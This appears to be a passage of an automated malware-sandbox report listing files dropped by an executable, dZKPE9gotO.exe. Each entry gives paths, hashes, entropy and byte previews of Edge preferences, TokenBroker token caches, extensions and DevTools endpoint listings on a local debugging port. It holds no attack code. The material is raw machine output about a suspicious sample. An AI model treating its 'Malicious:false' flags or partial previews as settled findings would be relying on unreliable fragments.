                                                                                                                                                                                                                                                SHA1:DA057ECB81B0BE5BEECF84C8C395D2BA0001FD0C
                                                                                                                                                                                                                                                SHA-256:F4EE99E1C2B445C114368CCE70705B0B050EA03D38A120F3EC59625837EB454A
                                                                                                                                                                                                                                                SHA-512:B94A77BC460376AC5000B9FA5E16F7CB05754341F8FA67CC53DDF2407591DB9B5167F796EFC74CFFA27C24F3792090870955C5C475A3A9CC08650D07611122DE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"cac4bf85-0420-4f2d-9460-404987ed9f05"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734365252"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                Entropy (8bit):3.848888920200425
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxSxl9Il8u02UnnZKiTxBHm/DnhW6LZfjSR0Kzd1rc:mLYC2UnZKiTxBHqnhW6tjSyKU
                                                                                                                                                                                                                                                MD5:59211C5B11856C30F4C6901AC4AAD129
                                                                                                                                                                                                                                                SHA1:85DF2B3AB942538FE9374FBC8DE64FF11E2BE695
                                                                                                                                                                                                                                                SHA-256:8835AE7EB4B7A1C6B7B9019484203078C43DF6EF49FECA9523FF386AD3C84CFB
                                                                                                                                                                                                                                                SHA-512:7134433BE7046C051205E7E6E83C2025A09CCE0D1DA317CBD0076A403A34062F8D9A008DB4D3361C77BC60FDBD16E9A72085FB60F30E598165B45EA8FB2C7DF3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.V.h./.d.x.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.j.D.6.A.p.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                Entropy (8bit):3.9952288911131153
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:KYC2Uvlw0Z0+XF91OskdEcu+BPgbSfwJerjuBBUFxyXUE6QluGkE92:KOOGqnOVdEcpBobSzjWBnluU92
                                                                                                                                                                                                                                                MD5:D5C641A2CFADBA7B127CC4BEDE34506D
                                                                                                                                                                                                                                                SHA1:007D652A3FB950A511B89E54E8C332FD834BC51C
                                                                                                                                                                                                                                                SHA-256:5F539713CDAA31B7F237BC1868BDB463ABFD13EE89281C3CBDBE6497A9A54EBD
                                                                                                                                                                                                                                                SHA-512:62132888C2AA4B1D81275D5BA519D78200EDCAD435E181A63B9A7542FB3E06A49D07F436C26F8D83CA3144E2CCB1A16C84BFF2167049D78FDF277BFD234DD6E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.I.U.o.4.9.R.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.j.D.6.A.p.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                Entropy (8bit):3.899270617919726
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xXxl9Il8u02UmbEZrUjP9AsJll+wcuuQsPMrFFMd/vc:aZYC2Umb5P9PlltcuuQsUxFl
                                                                                                                                                                                                                                                MD5:3E85C609F9AEEF7A10B2F3C23B7B9B33
                                                                                                                                                                                                                                                SHA1:B8BFEC38DB4DAA2A578A7E9331A0D60B23919E70
                                                                                                                                                                                                                                                SHA-256:EFADFB1F6BC8019D10655CCCD1FC998088F7999244A3D3E717780CD1AB7B152F
                                                                                                                                                                                                                                                SHA-512:6F365DC9BBCE2625F6A8333C6C71C7EFC2F03CF5406CA77D54FFF8A73BD4EC6B0E1B870A71B5B6072E3962FDBBA7E97BE9AD9205D22E9369217A359B37FCD2D8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.h.+.j.E.6.Z.u.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.j.D.6.A.p.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                Entropy (8bit):5.396854063373938
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:6NnCiHCXNnCHXGXpbCHXYNnCI9ClNnCRdgEC0NnCMCTNnCYDCENnCwwCZNnCNaMX:6NUN5NINavN4N/xN5bNga1s
                                                                                                                                                                                                                                                MD5:B441A47D7F4DA8C6E94E6077433114C4
                                                                                                                                                                                                                                                SHA1:99CF80163D3AE4C5AFD10D6D13CDFCEBCFEF933B
                                                                                                                                                                                                                                                SHA-256:1FD19A7029EAE9FB898A459E55F5BA9C842F717FF8A0FE9A4AF16769562AF4F7
                                                                                                                                                                                                                                                SHA-512:E05344AFA1717F22A73A86F142BE7ED084F76A83F5F03AD0C7EC36DA5664D220E321A24F3B589E110662CE31B22C1CA65EB4D1EE7C5F5F7D3AA99B0BD0A24D46
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2B26FA0DB920D5CADAE21063D78B7B07",.. "id": "2B26FA0DB920D5CADAE21063D78B7B07",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2B26FA0DB920D5CADAE21063D78B7B07"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1E92E8CCB263AA9B8FDBFF0D18E3743D",.. "id": "1E92E8CCB263AA9B8FDBFF0D18E3743D",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1E92E8CCB263AA9B8FDBFF0D18E3743D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                Entropy (8bit):5.361197464818854
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:SfNaoCGexTECGvfNaoC0CXfNaoC1CyfNaoC4Fr0UrU0U8C4g:6NnCGexTECGHNnC0CPNnC1CaNnCI0Uro
                                                                                                                                                                                                                                                MD5:41D2EB7E98712EC2BEAB1B73EBCB141C
                                                                                                                                                                                                                                                SHA1:2CAC51C5B62B122A29CD613FA88AA72ED21F6719
                                                                                                                                                                                                                                                SHA-256:295E54FB0D6C531E150CE4AF3F820B1ED1423277BEF02475C9C0256C3CB4FE94
                                                                                                                                                                                                                                                SHA-512:B4D26A0088FFCA99C3F903D03683AC2E0F6B73E1090215FA123858F33D555F87ABC52AFF204067888307EF3721F31DCC5E97B1D4B3439D7074E910827FFC29EF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FCBC8A9E25F8621A6CFAD69D1E4361BB",.. "id": "FCBC8A9E25F8621A6CFAD69D1E4361BB",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FCBC8A9E25F8621A6CFAD69D1E4361BB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/06E065402EA3BD539F713313542FA646",.. "id": "06E065402EA3BD539F713313542FA646",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/06E065402EA3BD539F713313542FA646"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1ce1eb4d-a207-4ef6-982a-c5e976566339.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\287b9929-2388-40f9-a4b3-c1eacd0c33aa.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1522376
                                                                                                                                                                                                                                                Entropy (8bit):7.991164456308662
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:24576:9hyLLqVMqWYhnSa0FKB83YHj/MsV1wJR0K9/oZaFPu+TQlYEhK2c68ZC2hqYHn4E:byMMqRn2Ki3CQs/RZa16+68Z13nkmGZu
                                                                                                                                                                                                                                                MD5:F1F6044E555C80FA9B361E2F60DBD464
                                                                                                                                                                                                                                                SHA1:A05BF045574DBB076B15E8BA81851FBFFB87FFB5
                                                                                                                                                                                                                                                SHA-256:6F5EB6E2ECD3B203EDFBAC49D1014B21C9C1EFFF980D1D8972FD2687C67E3014
                                                                                                                                                                                                                                                SHA-512:54455BE8CB6B69F6F47492B407234721C22C25BC00CAD69B14FED402B2102D04659C6AB877C43AA4B6D610CF93CB57B3162B5D63E9B7049F967FC596585CE1D4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip*....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX.*.D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.*....(.$....4E:.L.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\3785b344-19ba-437c-8a9d-b3ffdc1bb163.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4172ca52-b52a-4916-a309-4fc67d601a4e.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6b8df6ff-48e4-4927-8154-e3e1e6ebb5a4.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):76326
                                                                                                                                                                                                                                                Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\a99a361f-fe93-4ccd-8334-38a5f6655ecb.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
